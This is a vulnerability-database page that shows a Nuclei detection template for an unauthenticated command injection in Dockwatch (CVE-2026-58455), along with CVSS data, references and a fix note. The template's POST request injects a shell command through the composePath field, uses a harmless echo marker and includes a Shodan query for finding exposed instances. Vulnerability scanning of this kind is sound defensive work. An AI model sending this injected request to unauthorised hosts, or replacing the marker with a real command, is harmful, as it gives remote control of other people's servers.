Lucene search
+L

Dockwatch <= 0.6.567 - OS Command Injection

🗓️ 23 Jul 2026 08:13:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 3 Views

Dockwatch 0.6.567 has unauthenticated OS command injection via loader.php and ajax/compose.php; update.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-58455
2 Jul 202615:12
attackerkb
Circl
CVE-2026-58455
2 Jul 202617:01
circl
CVE
CVE-2026-58455
2 Jul 202615:12
cve
Cvelist
CVE-2026-58455 Dockwatch 0.6.567 Unauthenticated OS Command Injection via ajax/compose.php
2 Jul 202615:12
cvelist
EUVD
EUVD-2026-41405
2 Jul 202615:12
euvd
NVD
CVE-2026-58455
2 Jul 202616:16
nvd
OSV
CVE-2026-58455 Dockwatch 0.6.567 Unauthenticated OS Command Injection via ajax/compose.php
2 Jul 202615:12
osv
Positive Technologies
PT-2026-55261
2 Jul 202600:00
ptsecurity
VulnCheck KEV
VulnCheck KEV: CVE-2026-58455
21 Jul 202600:00
vulncheck_kev
Vulnrichment
CVE-2026-58455 Dockwatch 0.6.567 Unauthenticated OS Command Injection via ajax/compose.php
2 Jul 202615:12
vulnrichment
Rows per page
id: CVE-2026-58455

info:
  name: Dockwatch <= 0.6.567 - OS Command Injection
  author: DhiyaneshDk
  severity: critical
  description: |
    Dockwatch through 0.6.567 contains an unauthenticated command injection caused by missing exit() after authentication redirect in loader.php and unsanitized input in ajax/compose.php, letting remote attackers execute arbitrary shell commands, exploit requires seeding a session flag via incomplete auth check.
  impact: |
    Remote attackers can execute arbitrary shell commands, potentially leading to full host compromise.
  remediation: |
    Update to the latest version that fixes the authentication and input validation issues.
  reference:
    - https://github.com/Notifiarr/dockwatch/pull/135
    - https://nvd.nist.gov/vuln/detail/CVE-2026-58455
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-58455
    cwe-id: CWE-78
    epss-score: 0.0119
  metadata:
    max-request: 2
    vendor: notifiarr
    product: dockwatch
    shodan-query: title:"Dockwatch"
  tags: cve,cve2026,dockwatch,rce

flow: http(1) && http(2)

variables:
  cmd: "echo CVE-2026-58455 | rev"

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Dockwatch")'
        condition: and
        internal: true

  - raw:
      - |
        POST /ajax/compose.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        m=composePull&composePath=x;{{cmd}};#

    matchers:
      - type: word
        part: body
        words:
          - '55845-2602-EVC'
# digest: 4b0a00483046022100987ff847bd030c94be7eb92875e7b9374ca4efde1ac4acfe8a89f567be248dce022100a397368a395b9a621b4c8a096e4a390184da04c4bf1197f9bb159c0cd49c43ac:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Jul 2026 19:44Current
5.8Medium risk
Vulners AI Score5.8
CVSS 49.2
CVSS 3.19.8
EPSS0.0119
SSVC
3